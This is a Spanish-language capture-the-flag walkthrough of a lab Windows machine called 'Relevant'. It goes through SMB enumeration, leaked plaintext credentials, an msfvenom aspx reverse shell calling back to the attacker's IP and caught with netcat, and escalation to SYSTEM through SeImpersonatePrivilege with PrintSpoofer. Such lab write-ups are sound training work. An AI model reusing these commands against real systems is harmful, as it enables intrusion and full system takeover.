# Relevant

## Nmap

alt text alt text

### Nmap SMB

alt text

## Threader3000

Permite ver los puertos abiertos

            threader3000
        
alt text

Fuzzing

            gobuster dir -u http://10.10.48.117 -w Desktop/common.txt -x php 
        
alt text

Enum4linux

alt text

SMB

            smbmap -H 10.10.48.117
        
alt text
            smbclient -L 10.10.48.117
        
alt text

Entramos en el usuario y descargamos el archivo passwords.txt

            smbclient //10.10.48.117/nt4wrksv -N
        
alt text

Contenido del archivo

alt text

Decodificamos usando CyberChef

alt text
            Bob - !P@$$W0rD!123
            Bill - Juw4nnaM4n420696969!$$$
        

Tenemos acceso web al archivo subido en SMB

alt text

Creamos una aspx reverse shell, para subirla al servidor

            msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.67.209 LPORT=53 -f aspx -o pwn.aspx
        
alt text

Subimos el archivo

alt text

Nos conectamos a la reverse shell

            curl http://10.10.179.154:49663/nt4wrksv/pwn.aspx

            nc -nvlp 53
        
alt text alt text

Buscamos el archivo user.txt

alt text

Vemos nuestros privilegios

alt text

Encontramos SeImpersonatePrivilege, existe un exploit que nos permite explotar esta vulnerabilidad

Clonamos el siguiente repositorio

            git clone https://github.com/dievus/printspoofer.git
        

Subimos el .exe al servidor samba

alt text

Lo ejecutamos y ya seremos nt authority\system

alt text